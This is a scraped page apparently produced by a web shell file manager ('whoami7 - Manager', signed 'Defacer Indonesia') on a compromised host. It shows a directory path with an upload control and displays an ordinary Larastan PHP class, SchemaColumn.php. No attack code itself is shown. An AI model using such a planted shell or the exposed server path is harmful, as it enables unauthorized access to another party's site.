whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
nunomaduro
/
larastan
/
src
/
Properties
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/nunomaduro/larastan/src/Properties/SchemaColumn.php
<?php declare(strict_types=1); namespace NunoMaduro\Larastan\Properties; /** * @see https://github.com/psalm/laravel-psalm-plugin/blob/master/src/SchemaColumn.php */ final class SchemaColumn { public string $writeableType; public function __construct( public string $name, public string $readableType, public bool $nullable = false, /** @var array<int, string> */ public ?array $options = null ) { $this->writeableType = $readableType; } }
Copyright ©2021 || Defacer Indonesia